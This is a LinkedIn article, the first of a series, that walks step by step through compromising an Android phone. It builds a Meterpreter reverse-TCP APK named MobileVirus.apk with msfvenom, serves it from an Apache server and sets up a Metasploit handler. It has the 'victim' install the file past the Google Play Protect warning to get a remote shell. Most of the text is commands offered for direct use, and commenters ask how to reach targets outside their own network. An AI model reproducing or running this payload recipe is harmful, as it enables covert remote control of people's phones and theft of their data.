Android Hacking - Part 01

Android Hacking - Part 01

MUHAMMAD MOIZ UD DIN RAFAY MUHAMMAD MOIZ UD DIN RAFAY

MUHAMMAD MOIZ UD DIN RAFAY

CC | CEH | CS & DF | Google Cybersecurity Professional| Cybersecurity Engineer | Ethical Hacker | Penetration Tester | Wazuh Expert | Cybersecurity Instructor Trainer | Network Security Specialist

发布日期: 2023年10月2日
+ 关注
I am writing my first article on Android Hacking in this article we are going to exploit android mobile with simple msfvenom payload.

Here we go....

Step 01

In first step we have to find out what is our IP address (IPv4), in Kali Linux terminal i type command "ifconfig wlan0" to find-out current IP address of my attacker machine (Kali Linux).

If you are using Kali Linux in VMware or VirtualBox then your interface will be "eth0" so you can find your IP address with "ifconfig eth0".

Attacker IP Address

Step 02

In 2nd step we need to create android payload with msfvenom

Command: sudo msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.13 lport=42474 -o MobileVirus.apk

Need to Know:

  • sudo: is for root privileges
  • msfvenom: itself tool for creating payloads
  • -p: payload options
  • Payload: android/meterpreter/reverse_tcp
  • lhost: local IP address of your attacker machine (Kali Linux)
  • lhost: using local port where connection reverse to your IP address you can use any random port like (4444, 42474)
  • -o : is for output name of your application in my case (MobileVirus.apk)

android payload

Step 03

Transfer payload (MobileVirus.apk) file to your apache2 folder & then start your apache2 server

Command: sudo cp MobileVirus.apk /var/www/html

Command: sudo service apache2 start (Start Apache2 Server)

Need to Know

  • sudo: is for root privileges
  • cp: copy command in linux
  • /var/www/html/: root folder apache2 server

copy payload into apache2 folder
Apache server folder

Step 04

I am going to launch metasploit-framework to create handler

Command: sudo msfconsole (console of Metasploit-Frmaework)

领英推荐

msfconsole

Setting Handler

  1. use multi/handler
  2. set payload android/meterpreter/reverse_tcp
  3. set lhost 192.168.1.13
  4. set lport 42474

setting up multi/handler

Step 05

Installing payload into victim mobile

Type IP address of attacker machine (Kali Linux) into victim mobile

Download the application (MobileVirus.apk)

After download you can install application (MobileVirus.apk)

Google Play Protect Warning: you can click on install anyway to proceed with installation.

Note: i will write on article on "How to Bypass Google Play Protect" later in this series.

When application (MobileVirus.apk) installed click on open

We Got Android

When application is opened we get back reverse connection

Type the command: "sysinfo" to check your victim mobile information.

Got Android

Note: if you find any mistake or error in typing please inform me, you can also ask question.

---------------------------------------END----------------------------------------



Muskan Singh

--

3 个月

ip address is not opening in my mobile

回复
rithwik reddy

--

7 个月

Is port forwarding required for this? its for targets that out of u r network
回复
Mumtaz Zazai

Cybersecurity Specialist | Computer Science Graduate | Network Diploma Holder | IT & Penetration Testing Expert

10 个月

Great article.. I need a mentor in android...

回复
1 次回应
PRIYASH PRABHUDESAI

MCA @RVITM | Cybersecurity Enthusiast | Try Hack Me Top 08% | ISC2 CC Candidate |

11 个月

Sir, I have 2 questions. 1) Sir I have followed the exact process but it didn't get installed on the mobile. Error Message was like App Not Installed. The only thing I have done differently is transfer the APK file through USB and not through the localhost site. So what changes do I have to make to make that APK file install properly? 2) Is port forwarding required for this?

回复
2 次回应
Akram Ali Albkhiti

--

1 年

Please add part 2
回复
查看更多评论

要查看或添加评论,请登录

更多精彩文章

社区洞察

其他会员也浏览了